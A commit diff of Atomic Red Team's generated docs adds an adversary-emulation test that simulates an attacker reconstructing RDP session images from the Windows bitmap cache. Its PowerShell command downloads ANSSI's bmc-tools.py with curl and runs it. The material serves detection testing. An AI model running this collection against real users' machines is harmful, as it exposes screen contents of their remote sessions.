Generated docs from job=generate-docs branch=master [ci skip]

2026-01-06 11:47:41 +00:00
parent a5d2c7f122
commit 64b1d2667b
12 changed files with 151 additions and 6 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1761-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1762-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)


 Atomic Red Team™ is a library of tests mapped to the
@@ -1559,6 +1559,7 @@ collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freeb
 collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
+collection,T1113,Screen Capture,10,RDP Bitmap Cache Extraction via bmc-tools,98f19852-7348-4f99-9e15-6ff4320464c7,powershell
 collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
@@ -1089,6 +1089,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,12,Copy and Com
 collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
+collection,T1113,Screen Capture,10,RDP Bitmap Cache Extraction via bmc-tools,98f19852-7348-4f99-9e15-6ff4320464c7,powershell
 collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
 collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
@@ -2113,6 +2113,7 @@
  - Atomic Test #7: Windows Screencapture [windows]
  - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
  - Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted [windows]
+  - Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools [windows]
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
  - Atomic Test #1: Input Capture [windows]
@@ -1505,6 +1505,7 @@
  - Atomic Test #7: Windows Screencapture [windows]
  - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
  - Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted [windows]
+  - Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools [windows]
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
  - Atomic Test #1: Input Capture [windows]
@@ -81829,7 +81829,6 @@ collection:
      auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
      description: |
        Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
-
        [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
      supported_platforms:
      - windows
@@ -81871,6 +81870,45 @@ collection:
          '
        name: powershell
        elevation_required: true
+    - name: RDP Bitmap Cache Extraction via bmc-tools
+      auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
+      description: |
+        Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
+        This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
+      supported_platforms:
+      - windows
+      input_arguments:
+        cache_path:
+          description: Path to the RDP Cache directory or specific .bmc file
+          type: path
+          default: "$env:LOCALAPPDATA\\Microsoft\\Terminal Server Client\\Cache"
+        output_dir:
+          description: Directory to save reconstructed images
+          type: path
+          default: "$env:TEMP\\rdp_screens"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and in the PATH to run bmc-tools.py
+
+          '
+        prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "Please install Python manually."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'\n$toolsDir
+          = \"$env:TEMP\\bmc-tools.py\"\n \n# create output directory\nNew-Item -ItemType
+          Directory -Path #{output_dir} -Force | Out-Null\n\n# python script download\n&
+          curl.exe -L $url --output $toolsDir\n \n# execution step\nif (Test-Path
+          $toolsDir) { python $toolsDir -s \"#{cache_path}\" -d #{output_dir} -b }\n"
+        cleanup_command: |
+          Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
+          Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
  T1557:
    technique:
      type: attack-pattern
@@ -66924,7 +66924,6 @@ collection:
      auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
      description: |
        Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
-
        [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
      supported_platforms:
      - windows
@@ -66966,6 +66965,45 @@ collection:
          '
        name: powershell
        elevation_required: true
+    - name: RDP Bitmap Cache Extraction via bmc-tools
+      auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
+      description: |
+        Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
+        This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
+      supported_platforms:
+      - windows
+      input_arguments:
+        cache_path:
+          description: Path to the RDP Cache directory or specific .bmc file
+          type: path
+          default: "$env:LOCALAPPDATA\\Microsoft\\Terminal Server Client\\Cache"
+        output_dir:
+          description: Directory to save reconstructed images
+          type: path
+          default: "$env:TEMP\\rdp_screens"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and in the PATH to run bmc-tools.py
+
+          '
+        prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "Please install Python manually."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'\n$toolsDir
+          = \"$env:TEMP\\bmc-tools.py\"\n \n# create output directory\nNew-Item -ItemType
+          Directory -Path #{output_dir} -Force | Out-Null\n\n# python script download\n&
+          curl.exe -L $url --output $toolsDir\n \n# execution step\nif (Test-Path
+          $toolsDir) { python $toolsDir -s \"#{cache_path}\" -d #{output_dir} -b }\n"
+        cleanup_command: |
+          Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
+          Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
  T1557:
    technique:
      type: attack-pattern
@@ -27,6 +27,8 @@ Adversaries may attempt to take screen captures of the desktop to gather informa

 - [Atomic Test #9 - Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted](#atomic-test-9---windows-recall-feature-enabled---disableaidataanalysis-value-deleted)

+- [Atomic Test #10 - RDP Bitmap Cache Extraction via bmc-tools](#atomic-test-10---rdp-bitmap-cache-extraction-via-bmc-tools)
+

 <br/>

@@ -348,7 +350,6 @@ rm #{output_file} -ErrorAction Ignore

 ## Atomic Test #8 - Windows Screen Capture (CopyFromScreen)
 Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
-
 [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen

 **Supported Platforms:** Windows
@@ -422,4 +423,66 @@ reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v Dis



+<br/>
+<br/>
+
+## Atomic Test #10 - RDP Bitmap Cache Extraction via bmc-tools
+Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
+This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 98f19852-7348-4f99-9e15-6ff4320464c7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cache_path | Path to the RDP Cache directory or specific .bmc file | path | $env:LOCALAPPDATA&#92;Microsoft&#92;Terminal Server Client&#92;Cache|
+| output_dir | Directory to save reconstructed images | path | $env:TEMP&#92;rdp_screens|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'
+$toolsDir = "$env:TEMP\bmc-tools.py"
+ 
+# create output directory
+New-Item -ItemType Directory -Path #{output_dir} -Force | Out-Null
+
+# python script download
+& curl.exe -L $url --output $toolsDir
+ 
+# execution step
+if (Test-Path $toolsDir) { python $toolsDir -s "#{cache_path}" -d #{output_dir} -b }
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
+Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Python must be installed and in the PATH to run bmc-tools.py
+##### Check Prereq Commands:
+```powershell
+if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "Please install Python manually."
+```
+
+
+
+
 <br/>
@@ -209,6 +209,7 @@ atomic_tests:
    name: powershell
    elevation_required: true
 - name: RDP Bitmap Cache Extraction via bmc-tools
+  auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
  description: |
    Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
    This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
@@ -1784,3 +1784,4 @@ d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1
 13c0fef5-9be9-4d7f-9c6b-901624e53770
 71eab73d-5d7d-4681-9a72-7873489a5b85
 c63bbe52-6f17-4832-b221-f07ba8b1736f
+98f19852-7348-4f99-9e15-6ff4320464c7